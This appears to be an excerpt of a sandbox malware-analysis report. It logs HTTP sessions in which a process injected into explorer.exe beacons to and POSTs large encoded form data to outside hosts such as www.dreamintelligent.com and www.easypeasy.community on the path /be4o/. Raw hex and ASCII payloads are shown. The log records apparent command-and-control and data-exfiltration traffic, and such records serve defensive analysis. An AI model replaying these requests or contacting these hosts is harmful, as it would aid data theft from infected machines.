                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 6c 79 50 62 4b 6b 33 50 69 46 59 63 6f 63 56 34 4d 70 53 50 63 72 5a 34 65 61 41 35 33 51 78 64 61 6f 35 6d 37 6d 31 59 65 4f 69 52 44 74 52 6e 58 4f 47 63 33 5a 68 35 57 6f 37 7a 77 4d 30 64 45 5f 74 72 69 6a 42 74 75 4e 72 42 6e 6e 70 68 61 71 74 5a 76 45 30 4a 47 2d 57 6a 79 49 36 50 64 33 77 38 6f 53 76 31 7e 79 64 78 73 49 45 69 63 56 6f 59 71 51 49 37 35 4e 36 72 75 37 62 6d 55 45 52 6d 46 4e 59 50 6f 74 28 56 49 5a 42 38 4a 32 4e 50 6f 52 7a 74 6b 39 46 54 63 74 4d 6a 70 34 55 75 65 42 37 48 55 4f 43 61 70 78 69 78 45 6e 51 72 71 46 62 5f 59 48 4d 67 62 77 56 2d 71 47 70 64 41 53 51 51 5a 4d 34 32 74 70 52 79 59 53 30 5f 46 36 28 5a 4f 31 31 71 33 4d 4e 34 66 4d 4b 53 75 36 46 39 61 5a 67 33 74 47 41 38 46 43 56 4a 73 57 63 6c 71 39 67 70 6e 78 64 54 6d 42 43 67 54 34 31 65 71 41 77 7a 67 38 6b 54 4a 41 71 42 71 49 31 38 50 65 75 77 56 45 59 42 52 76 49 4c 4d 73 39 69 76 32 4a 68 42 55 61 53 6a 78 35 61 6c 53 5a 35 65 43 78 6e 4c 35 59 47 6e 4b 7e 34 47 64 33 75 79 43 7e 79 61 6b 35 4f 39 48 61 34 48 39 78 73 69 70 7e 41 58 32 4f 6c 51 37 44 61 71 78 31 37 56 68 39 44 64 42 30 72 49 6d 57 36 41 47 44 47 6b 46 38 65 28 4e 78 69 79 62 32 53 49 56 28 62 4c 6a 65 74 48 44 66 77 78 6a 33 51 55 72 72 68 30 68 66 48 70 52 32 34 4d 39 66 6c 52 6a 56 52 36 64 7e 51 66 56 32 66 41 6f 7e 57 6c 62 6a 5f 50 51 79 30 38 2d 49 6c 58 4a 34 6a 33 69 69 36 4a 6d 43 54 38 48 4f 50 56 74 6a 65 79 42 4b 30 52 6d 62 43 4f 37 79 4a 46 37 75 5f 76 57 45 5f 48 44 6b 30 34 42 71 5a 61 57 57 75 45 4f 6a 38 34 6f 34 46 75 68 4c 46 58 34 57 2d 39 61 36 58 6b 36 76 41 4a 6d 4d 52 32 73 63 54 4a 77 39 56 50 72 34 6d 35 42 4d 61 59 56 6d 54 72 59 66 4b 6e 67 52 43 79 34 48 36 65 6e 4f 53 56 46 7a 42 65 38 67 4d 59 46 6d 43 30 4d 4b 34 35 39 47 78 4d 47 47 50 44 73 6b 6c 7e 32 52 53 4f 59 28 66 58 68 7a 49 51 6e 73 66 39 36 4e 6f 63 74 70 5f 55 79 49 59 6e 55 7a 66 35 54 28 54 46 49 73 6c 78 65 79 48 64 74 35 78 6a 5a 69 76 7a 59 67 73 5a 31 59 66 74 78 68 47 38 44 78 52 54 46 6d 76 55 59 75 6a 65 6f 56 4b 77 6f 6a 65 78 58 74 49 74 76 43 69 4e 59 67 52 75 5a 7e 70 49 78 64 4f 74 51 41 55 64 51 74 6c 72 69 48 5a 45 66 43 35 4f 45 77 6e 6a 6b 34 34 7e 71 32 73 5a 61 63 6b 28 33 78 63 37 6c 33 33 73 5a 77 51 6f 34 46 2d 4a 6b 39 4f 38 34 72 38 4c 4b 77 48 30 32 38 36 62 6b 47 6c 75 53 6f 66 6d 54 59 37 65 71 50 2d 71 6c 4f 35 46 6b 35 71 61 31 41 65 45 75 30 56 37 70 48 51 36 55 78 6d 55 6c 68 32 31 2d 4e 7a 38 45 4b 79 28 72 75 32 43 5a 35 78 56 32 37 34 52 47 6e 34 31 6a 36 35 6e 71 4a 72 4c 56 74 31 31 4a 41 54 35 72 47 4e 79 5a 69 70 36 4f 6f 73 43 53 4a 55 6f 6d 64 4b 44 69 72 6b 44 74 73 4b 70 42 55 6e 7e 50 66 58 71 43 68 73 59 34 73 73 35 70 57 5a 5a 4e 55 49 52 35 47 37 56 4a 64 41 45 6b 7e 66 72 4f 7e 69 43 4d 74 2d 58 45 46 32 66 74 55 2d 4a 35 30 79 4a 4f 56 78 4d 2d 32 64 6c 32 52 6f 33 54 4f 38 4c 76 66 52 59 47 61 5f 70 70 39 49 6b 57 77 78 51 61 67 4c 6c 7a 39 7a 72 33 7e 30 6b 32 57 4f 67 4a 53 45 46 77 32 55 6a 61 71 62 6f 41 62 35 55 57 4f 54 59 4f 4a 69 70 50 78 62 28 4a 58 2d 4a 4a 6c 38 4b 44 59 74 4f 47 78 34 66 51 47 33 49 50 46 44 6c 43 34 77 66 6e 56 30 39 2d 46 64 6e 4b 43 33 58 6d 56 6b 39 4c 67 43 66 7a 46 4d 49 54 66 34 76 47 66 46 6f 68 52 35 56 62 6d 30 36 51 55 4a 77 38 31 52 64 6c 43 4a 53 41 75 79 57 51 65 46 69 73 6a 74 47 64 4e 52 78 52 30 50 41 6c 31 78 46 77 49 69 4f 7a 4b 6d 57 79 47 57 6b 55 47 76 51 79 62 5a 67 33 63 70 53 5f 66 57 45 56 31 35 7a 78 56 34 68 75 38 39 4f 48 6f 6a 6a 6f 48 6d 70 71 50 2d 78 42 52 70 65 36 52 31 28 72 77 4b 46 59 53 41 59 44 66 72 53 32 46 58 53 37 37 4d 73 48 70 75 34 69 73 70 7e 35 57 65 35 48 61 79 51 50 67 66 64 48 45 53 4b 7a 7e 4b 6e 36 55 38 56 68 6b 30 67 68 59 4a 34 4f 55 4d 64 6e 70 68 4d 62 74 78 31 38 45 41 56 63 37 72 4f 33 50 75 57 61 74 50 5a 46 32 32 74 4d 59 4c 74 77 4b 44 35 75 49 73 55 78 57 59 52 6c 58 43 68 53 65 49 45 5a 78 77 70 47 42 51 45 41 31 4a 55 56 5a 6b 4b 50 6f 6b 69 6e 7e 56 32 78 45 49 57 75 28 6f 62 50 74 5f 31 67 70 78 71 73 50 70 30 61 33 52 51 53 79 54 67 63 63 46 57 6a 6c 39 66 36 65 38 6c 4d 66 47 58 41 59 73 6b
                                                                                                                                                                                                                              Data Ascii: h48Hl=lyPbKk3PiFYcocV4MpSPcrZ4eaA53Qxdao5m7m1YeOiRDtRnXOGc3Zh5Wo7zwM0dE_trijBtuNrBnnphaqtZvE0JG-WjyI6Pd3w8oSv1~ydxsIEicVoYqQI75N6ru7bmUERmFNYPot(VIZB8J2NPoRztk9FTctMjp4UueB7HUOCapxixEnQrqFb_YHMgbwV-qGpdASQQZM42tpRyYS0_F6(ZO11q3MN4fMKSu6F9aZg3tGA8FCVJsWclq9gpnxdTmBCgT41eqAwzg8kTJAqBqI18PeuwVEYBRvILMs9iv2JhBUaSjx5alSZ5eCxnL5YGnK~4Gd3uyC~yak5O9Ha4H9xsip~AX2OlQ7Daqx17Vh9DdB0rImW6AGDGkF8e(Nxiyb2SIV(bLjetHDfwxj3QUrrh0hfHpR24M9flRjVR6d~QfV2fAo~Wlbj_PQy08-IlXJ4j3ii6JmCT8HOPVtjeyBK0RmbCO7yJF7u_vWE_HDk04BqZaWWuEOj84o4FuhLFX4W-9a6Xk6vAJmMR2scTJw9VPr4m5BMaYVmTrYfKngRCy4H6enOSVFzBe8gMYFmC0MK459GxMGGPDskl~2RSOY(fXhzIQnsf96Noctp_UyIYnUzf5T(TFIslxeyHdt5xjZivzYgsZ1YftxhG8DxRTFmvUYujeoVKwojexXtItvCiNYgRuZ~pIxdOtQAUdQtlriHZEfC5OEwnjk44~q2sZack(3xc7l33sZwQo4F-Jk9O84r8LKwH0286bkGluSofmTY7eqP-qlO5Fk5qa1AeEu0V7pHQ6UxmUlh21-Nz8EKy(ru2CZ5xV274RGn41j65nqJrLVt11JAT5rGNyZip6OosCSJUomdKDirkDtsKpBUn~PfXqChsY4ss5pWZZNUIR5G7VJdAEk~frO~iCMt-XEF2ftU-J50yJOVxM-2dl2Ro3TO8LvfRYGa_pp9IkWwxQagLlz9zr3~0k2WOgJSEFw2UjaqboAb5UWOTYOJipPxb(JX-JJl8KDYtOGx4fQG3IPFDlC4wfnV09-FdnKC3XmVk9LgCfzFMITf4vGfFohR5Vbm06QUJw81RdlCJSAuyWQeFisjtGdNRxR0PAl1xFwIiOzKmWyGWkUGvQybZg3cpS_fWEV15zxV4hu89OHojjoHmpqP-xBRpe6R1(rwKFYSAYDfrS2FXS77MsHpu4isp~5We5HayQPgfdHESKz~Kn6U8Vhk0ghYJ4OUMdnphMbtx18EAVc7rO3PuWatPZF22tMYLtwKD5uIsUxWYRlXChSeIEZxwpGBQEA1JUVZkKPokin~V2xEIWu(obPt_1gpxqsPp0a3RQSyTgccFWjl9f6e8lMfGXAYskQonOPf1BX13NRi5V1sFtkjYzCqx(QSoXFduMPepElmNOhXPk-qGiAHzpNzbFmRA7-fPdZ3ukgmWsLPthoZa0ezANVSAOljp3EFt15bQoQwkhL9d~vexA3OKcz9ijcb1CaS9eOTiwb(aVm1pcaUyBcNExLL96lhZtgliJb686JO9Io9oQ7waU63zwI(B4aRzKhR3LpolqCcd497ughsnIeaIsPSaKP9NEAPoc874T-0uzSuolCnNWCEq2aMTlRXDzdKWrxMJUZ(tKlNdNeOY3te0Jefd5_1xtBrLqfF7nI907nQzTfALiXd3nC1k8pre4qzdX8fw0vG8K_UN(5mDXkTP6YsRp_Mn6T7tVxOq7i1l5aEdBKnF(BN9pzvCxZG2BcNBzjjFCByQKR5Qwi~_iV9deGF6bn3c6vQMznVyyekfLwGMy0fZPZsXJjkVDjUW39bGRgvq6n1eppVMpsrzTQJYp7zZC2xGEojJvwmROU1ahsAyasOcZWYtHMgurI~NnO9ZWoVwfCF_flnWm_2e4EX0OJfF0ryVmR9Z21TFYMNtTMbqiOKQwH09QxyL5gOHt-Jufi1zIRA4TEZks8oM3qZHPzPiWVZNhOQP4B2SOBzEVccO2K4BAKfATAZZrH5JFo58Tj7At7lBshHBdz6MrrgjEggXT5pALAaAIOjVDpj2RPT-(AmSUs7-RpVZoFABWuhOF95o4LXqOimUiPGAdCykhump~5tEgLd5mByh~WQ1LCl9k_jd8yIPI0DREB~p~5eZOwMHnCzuWf0QMuXbYyTpC2LGUaSdBzNsGeyJNxyXw2wpoucc2ZV9HnYarqZVGFp5nbaW5z7ZlgVzn9Y24g(eCAXPQ9UBvpm6bgwNtB93K8PJcUd6VhTuynEz4NnPd7
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.192161083 CET10797OUTData Raw: 6f 6a 4b 65 4d 39 73 52 47 45 76 63 61 50 4a 76 31 4c 65 4b 41 37 4a 59 55 79 47 50 7a 31 52 30 54 71 34 36 6c 75 64 6e 39 65 49 70 64 50 73 48 33 43 58 67 73 75 28 52 41 4b 4f 57 64 54 62 2d 6d 77 4e 4d 74 35 72 53 51 31 72 73 33 6e 4d 74 68 37
                                                                                                                                                                                                                              Data Ascii: ojKeM9sRGEvcaPJv1LeKA7JYUyGPz1R0Tq46ludn9eIpdPsH3CXgsu(RAKOWdTb-mwNMt5rSQ1rs3nMth7MU4Kr1zHpbbiEaKHbWjx6XzaZlcaHxRFzLItSDorgYIqniLhKCre5SLWXkp9TM4UcA9IzYS8(b44EtSmDVS6vcqZiIwUHzxZRq0Cv8xDLZkevOLXjeAN~x5Tx9G0ipMofpAUT-ojA-Brl17BnIKh7wmBEf~AEIYVa
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209059954 CET10798INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx/1.20.2
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:38 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 169
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.easypeasy.community/be4o/
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.2</center></body></html>
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209177971 CET10801OUTData Raw: 62 68 43 54 6a 74 36 57 31 48 4b 56 62 34 38 65 72 6a 72 63 4f 4a 6a 59 38 39 37 38 78 74 6c 4a 55 45 5a 53 79 6d 70 47 37 75 32 6d 56 64 58 35 56 32 7a 7a 51 48 6e 34 41 52 34 75 57 73 74 58 48 32 38 63 43 62 70 37 37 64 79 57 78 6e 6c 30 33 39
                                                                                                                                                                                                                              Data Ascii: bhCTjt6W1HKVb48erjrcOJjY8978xtlJUEZSympG7u2mVdX5V2zzQHn4AR4uWstXH28cCbp77dyWxnl0397LS2VIFqZPJklbhR2B(NsdNhQq3AC_4rOFPREnUJtr(7h7Qzdex21g7v5Ox9hzpktHNZCJ(R(KwhaPoL5Pibby8ucsbq5CoNufmNlykDskH1HRnUGH~tfd2CkCWNml9p(6z4Q06ObAGbHgxy77lBzpDBWUTd7Del0
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209398031 CET10809OUTData Raw: 41 31 38 53 4d 56 28 75 74 38 56 4a 76 32 39 70 4b 52 37 7a 77 37 4f 47 30 7a 61 35 4c 30 4c 5f 6d 56 56 4b 4a 41 44 76 38 32 63 6e 54 59 64 5a 34 59 52 38 52 59 47 31 70 6f 63 54 71 39 76 6d 6c 51 78 47 62 70 54 39 73 68 31 6e 4b 53 70 73 4a 51
                                                                                                                                                                                                                              Data Ascii: A18SMV(ut8VJv29pKR7zw7OG0za5L0L_mVVKJADv82cnTYdZ4YR8RYG1pocTq9vmlQxGbpT9sh1nKSpsJQexSNNfLln1Mk5QULTexCcLGDRNlEeJIDCScOQrr6H4aUHyG9pn0fLWynEH1_aYHdPkdx(NJuMlA9RpbSKnZj7SGgGdn3Uj616JzBk6WNhtmTIo~LXK0RqfG4tLWhever6f4oMdkU6ud_f4dg1vpV5SezXxDtE79B3


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              45192.168.11.204984491.184.31.21780C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.209454060 CET10809OUTGET /be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7 HTTP/1.1
                                                                                                                                                                                                                              Host: www.easypeasy.community
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:55:38.226428986 CET10810INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx/1.20.2
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:55:38 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 169
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.easypeasy.community/be4o/?h48Hl=qw7hUB7wiBY63PZfQs3gDL1/RbwQ/gEcLPIEvk4CQbmdP+9FY8/qx5kKOZH67IcfD5ki&7nx8=7nN0Wh-H7
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              46192.168.11.2049845185.190.39.5280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:48.389020920 CET10817OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.dreamintelligent.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.dreamintelligent.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 34 69 75 38 7e 4f 4b 6f 77 34 51 4d 7e 65 57 41 32 77 55 57 4d 68 62 79 66 62 31 5f 7e 76 43 62 70 64 31 4e 78 6b 55 49 46 4f 36 43 73 43 51 75 63 4c 55 67 53 5a 63 48 65 74 37 43 6f 4c 4b 37 31 4e 66 45 46 68 41 48 72 53 76 31 32 66 5a 70 50 30 76 35 74 72 56 48 59 4b 73 37 41 66 54 72 38 75 79 6b 4f 51 28 31 64 65 45 4a 35 46 53 7a 75 66 44 58 66 66 5a 75 7e 67 31 44 32 61 35 4e 42 69 75 70 38 50 6c 30 77 67 44 4d 77 6d 38 65 33 78 6f 42 39 6b 6f 63 61 53 67 4e 79 32 37 74 4f 57 73 5a 72 64 67 4d 55 34 32 6a 6a 37 5a 69 52 73 73 6d 76 68 53 79 59 59 6a 6c 71 51 35 6a 57 72 72 68 75 67 34 2d 39 5f 54 7a 64 5a 65 72 74 71 6d 46 38 4e 43 57 4c 65 50 4b 39 49 58 6c 75 66 37 54 6d 68 4e 38 74 48 43 43 71 42 51 46 76 38 70 55 4a 74 62 57 67 54 73 36 4b 61 58 73 6d 49 64 5f 72 73 4d 56 41 54 63 4f 74 38 6a 37 53 57 54 64 33 48 47 69 79 76 38 43 75 46 44 4a 59 38 72 6f 68 48 54 35 59 36 52 30 68 4f 6e 5a 38 62 66 65 67 63 51 73 6d 35 6d 41 7e 4f 77 73 28 73 44 71 6d 52 70 52 67 58 75 4d 37 32 63 46 42 30 6e 4b 34 38 50 38 39 66 77 73 35 59 46 73 54 61 28 49 6d 32 28 76 65 43 67 74 49 34 4b 64 42 63 70 55 4d 6c 52 71 43 65 42 50 51 36 54 68 6a 36 6e 2d 48 46 35 75 72 4e 43 41 53 62 4c 2d 44 52 36 41 53 65 6b 78 68 38 4e 75 4a 36 28 36 4a 54 63 54 42 45 6a 55 66 49 63 30 75 63 48 4c 30 62 6e 79 48 31 51 50 44 37 68 47 69 61 53 6b 52 48 34 7a 34 50 62 67 36 43 43 62 68 74 45 42 30 4f 69 50 63 56 43 73 4c 2d 32 42 45 61 69 4f 44 63 76 4d 31 72 61 4b 76 4d 70 31 76 76 67 6b 73 74 56 72 34 7a 36 39 34 7a 63 75 6a 63 30 74 63 67 64 55 79 77 69 48 50 6a 70 63 76 35 64 5f 7e 5f 56 52 48 38 72 42 31 2d 56 4e 7a 7a 36 31 72 54 61 5f 77 65 61 37 28 74 79 53 53 51 36 58 72 50 43 63 44 4e 72 34 37 79 46 4b 71 64 46 44 38 39 7a 74 58 47 50 54 7e 53 34 49 62 44 70 62 36 42 55 58 6b 49 49 6f 58 4d 69 45 73 78 74 51 6a 78 57 55 38 32 57 71 6e 6c 52 68 51 6c 63 4f 7e 51 51 49 31 2d 56 51 69 52 37 33 61 4a 78 47 6d 65 4b 56 56 63 46 4b 75 6b 52 42 48 4a 75 6c 48 44 28 44 68 52 44 41 46 43 59 4d 58 72 76 61 5a 75 78 39 73 49 44 6b 53 69 36 33 47 62 66 35 6d 65 58 67 28 50 74 57 43 4e 49 35 4d 69 4c 39 4b 5a 4f 59 61 63 4d 56 6d 53 54 4f 44 6d 6b 49 48 55 77 70 76 69 4e 34 46 54 30 49 58 77 74 76 58 51 45 54 31 4f 63 77 74 43 70 68 56 78 48 78 44 4c 46 55 6f 69 39 58 67 69 7e 4a 4d 5a 34 6e 65 37 57 6a 44 36 45 5a 67 71 67 53 4f 2d 73 52 75 65 35 77 6a 35 69 42 52 30 7a 56 48 4e 54 35 6e 51 61 6c 4d 76 34 49 33 38 6e 6f 4f 71 71 36 70 72 30 46 32 48 4f 48 71 30 64 34 50 72 51 66 54 65 62 33 6e 58 33 41 78 5f 77 65 50 47 45 6d 49 2d 4b 71 51 72 4f 6a 7e 2d 28 64 63 65 41 6c 4f 49 79 7a 50 4f 7e 58 38 62 38 5f 4d 61 34 76 7a 34 51 54 36 44 76 65 39 37 45 41 5a 52 35 66 4f 36 54 7a 54 49 31 5a 4a 53 7e 41 59 4e 41 42 58 59 75 52 4c 47 30 4f 55 34 35 55 35 64 38 30 71 67 70 33 32 62 7a 79 36 74 59 67 54 71 6e 6e 33 74 42 37 59 64 43 6e 50 7a 78 6b 78 50 51 4a 46 78 77 61 47 55 6f 76 78 4d 7e 47 30 67 73 4e 6c 4a 31 4b 64 6b 77 52 52 41 31 54 72 4f 4b 65 4f 56 65 46 71 6d 51 5f 6f 64 4d 5f 59 4d 62 6a 47 33 71 51 43 52 37 37 56 39 69 37 37 70 74 55 53 2d 74 63 37 2d 31 6a 48 6c 34 59 37 69 37 63 62 47 67 32 6d 61 57 45 44 75 4f 78 68 49 6d 55 28 44 46 35 32 69 76 5a 65 58 4a 4a 54 4b 49 63 51 37 56 73 6e 72 66 54 66 73 31 6f 79 55 6c 77 58 50 53 34 34 52 79 44 4b 77 5a 56 66 64 70 78 58 75 73 59 59 56 67 35 70 39 59 38 68 5a 4f 33 42 51 37 50 78 35 43 57 68 31 67 4f 45 58 79 72 66 66 72 70 65 70 78 63 4d 53 7e 4b 33 68 4c 7a 63 75 72 57 4c 45 63 7a 61 4f 7a 53 35 5a 56 6d 4f 5f 59 70 68 64 31 62 72 66 56 7a 47 30 6d 78 51 62 31 54 41 51 30 4e 47 4a 65 57 30 33 79 4d 59 34 61 39 5a 48 56 46 54 6f 63 74 33 6c 56 4c 28 77 58 43 30 33 75 4e 4d 76 68 61 47 32 4d 48 75 73 72 49 6e 4d 6d 64 32 4e 6f 57 31 55 36 63 53 73 4c 56 54 77 65 66 5a 61 70 68 4c 6a 4b 50 30 49 52 5a 78 55 64 4f 32 6f 62 67 38 30 65 2d 69 34 67 73 68 63 31 47 48 41 77 53 55 44 79 2d 6b 52 57 30 7e 65 55 63 50 7a 48 6e 36 65 7a 79 42 76 42 4f 4f 52 42 48 50 78 65 36 7e 4a 64 66 4d 58 4c 61 63 6b 44 57 61 5a 31 36 67 4d 62 30 62 55 4c 31 49 70 69 58 39 53 79 53 4c
                                                                                                                                                                                                                              Data Ascii: h48Hl=4iu8~OKow4QM~eWA2wUWMhbyfb1_~vCbpd1NxkUIFO6CsCQucLUgSZcHet7CoLK71NfEFhAHrSv12fZpP0v5trVHYKs7AfTr8uykOQ(1deEJ5FSzufDXffZu~g1D2a5NBiup8Pl0wgDMwm8e3xoB9kocaSgNy27tOWsZrdgMU42jj7ZiRssmvhSyYYjlqQ5jWrrhug4-9_TzdZertqmF8NCWLePK9IXluf7TmhN8tHCCqBQFv8pUJtbWgTs6KaXsmId_rsMVATcOt8j7SWTd3HGiyv8CuFDJY8rohHT5Y6R0hOnZ8bfegcQsm5mA~Ows(sDqmRpRgXuM72cFB0nK48P89fws5YFsTa(Im2(veCgtI4KdBcpUMlRqCeBPQ6Thj6n-HF5urNCASbL-DR6ASekxh8NuJ6(6JTcTBEjUfIc0ucHL0bnyH1QPD7hGiaSkRH4z4Pbg6CCbhtEB0OiPcVCsL-2BEaiODcvM1raKvMp1vvgkstVr4z694zcujc0tcgdUywiHPjpcv5d_~_VRH8rB1-VNzz61rTa_wea7(tySSQ6XrPCcDNr47yFKqdFD89ztXGPT~S4IbDpb6BUXkIIoXMiEsxtQjxWU82WqnlRhQlcO~QQI1-VQiR73aJxGmeKVVcFKukRBHJulHD(DhRDAFCYMXrvaZux9sIDkSi63Gbf5meXg(PtWCNI5MiL9KZOYacMVmSTODmkIHUwpviN4FT0IXwtvXQET1OcwtCphVxHxDLFUoi9Xgi~JMZ4ne7WjD6EZgqgSO-sRue5wj5iBR0zVHNT5nQalMv4I38noOqq6pr0F2HOHq0d4PrQfTeb3nX3Ax_wePGEmI-KqQrOj~-(dceAlOIyzPO~X8b8_Ma4vz4QT6Dve97EAZR5fO6TzTI1ZJS~AYNABXYuRLG0OU45U5d80qgp32bzy6tYgTqnn3tB7YdCnPzxkxPQJFxwaGUovxM~G0gsNlJ1KdkwRRA1TrOKeOVeFqmQ_odM_YMbjG3qQCR77V9i77ptUS-tc7-1jHl4Y7i7cbGg2maWEDuOxhImU(DF52ivZeXJJTKIcQ7VsnrfTfs1oyUlwXPS44RyDKwZVfdpxXusYYVg5p9Y8hZO3BQ7Px5CWh1gOEXyrffrpepxcMS~K3hLzcurWLEczaOzS5ZVmO_Yphd1brfVzG0mxQb1TAQ0NGJeW03yMY4a9ZHVFToct3lVL(wXC03uNMvhaG2MHusrInMmd2NoW1U6cSsLVTwefZaphLjKP0IRZxUdO2obg80e-i4gshc1GHAwSUDy-kRW0~eUcPzHn6ezyBvBOORBHPxe6~JdfMXLackDWaZ16gMb0bUL1IpiX9SySLpODHx9upTRWh5G_w4s7xMUObwLQtH8OQCY7OEM_6N3OAK55WBDYmcMlBfV2cRycFXAgj059uT0z2YjDWZ1hHeArm5gyzhybs0s8jNyDYm39PoZCCxWqRVyMu2yKPfPBaRijBH53NSUHFQNc~JxbJm8ZRC8Sg9PdY-UWZDGMrd3ydZSgEHVWk1UFo7M9QW2YnLFSJ9mb7DtFpICP8YG5iLtMBvbLd3d9rTsq(L2mxcfotIJcZlyRgy(JCHoEXyqcalsVrrsR4giQmH9p3Rub~qy3hd3VKllmZxN7K5QTyiq3o55FJnD2(UQMFquS1VlGq1tQWnqad23Qd1ZlJs7I(5(BISRrpJUtgaf2FGCj5gIG~RSGqF2JOA2tO4RBMFe-GS0amYNLEivSkLtBHUYC9kBOCvABvjLdEtjmhqzB5gZPup5z0jSms-WESirih-ajVm~dSnOWhUtBAZFVcNCTSHY4TUxItXolAHzDaqFGeQQrZ1srNrh0CceSB8ojvNJBLJtwRHrdvn6CGNtdDChM2WV8JlhuewOOYowYXXtVm5pRhDJ-L0ijEpqdSeRXLL3yof7CusQwPGjUdTj-yvDamMJJCKKNQvrMHNbwYk~On48MAnbmTIvlTgYaeEVeNvrh1Rbk57IfoDYoykEgwmhMT-oYrFgoSMA0GnOG~7YdBfFMP47KJMloldGtqAiVVc1sNBZwfu91dqN9MUKce1x_gfDA(ENW2smUR-ObcZngLebwzLvB5DUDHqIcn2ZXCtG8OY15tAwxvAxGHpf2TjNNDlbTMJ2NsYr4A5NdhXDXvBAklpVEKUDB6UwZCo6T5PDM6mR0WPmvOLdGhmvIV2aCT1E0X0SUciN3KuRBDrGZdlB7qnTbn7I6O2ucr_nevMKItxv21Tk_NgGXT1es9I6vE9cD8_vMrmt_kONmw6JtDMirb6onf0jmejoa8aGkGtH8wPuhvRsyeEAul9Ynzz47(RJbIRBB77xIfezCYaLGl4X1phdgjzNYrqRJ9jj_6DeS3Eyb2r2vEesmWghoRScY0jWdkBSr4ZDpqVaSemIbTh3ExGqpry8QJtbKP5DtDfscjbGy~OfWRv8fZ5YDKUo98h2IrnZQGVKndVKiTlYKDi~5na86hQyXN6X05Aq5jlGcz04KJqxC3NCRJfwfFXy3blr4BJCSP2XExbT-ZcAKDcJUgvhut-~mTTIeR7jWYV7gc1XJEm2EwkAlg88-uUbqCXi89lR7TzQ880aLKOguyO5dPdguK-Y3hSAzPPucOTz7DhzvJ8ah9mESZv4I4OPwfb3Oo53fD6Z8vhB3BFmJoqSiZSpqF_ZfwSn3jO~c2Lpm8Y4ddIvGaIx1Kug_XwTM52b7l1a2GQIJi1fAHLGcyTE-YOL11ALjiclSM0dNYLXdz_0ORTPwmhlSiDxlmpPMRB4WfCoThwNEZGrI1kExhf0tZO3QOsfUTuQIgIYbyN2F35vZjxn847KT(wBphyoLplCvVEXjI_FiU1XOid8_lAWYIDKnTX(pGoq9QQkIC-A8vyHFGhJ0WrjXPFEKBpeN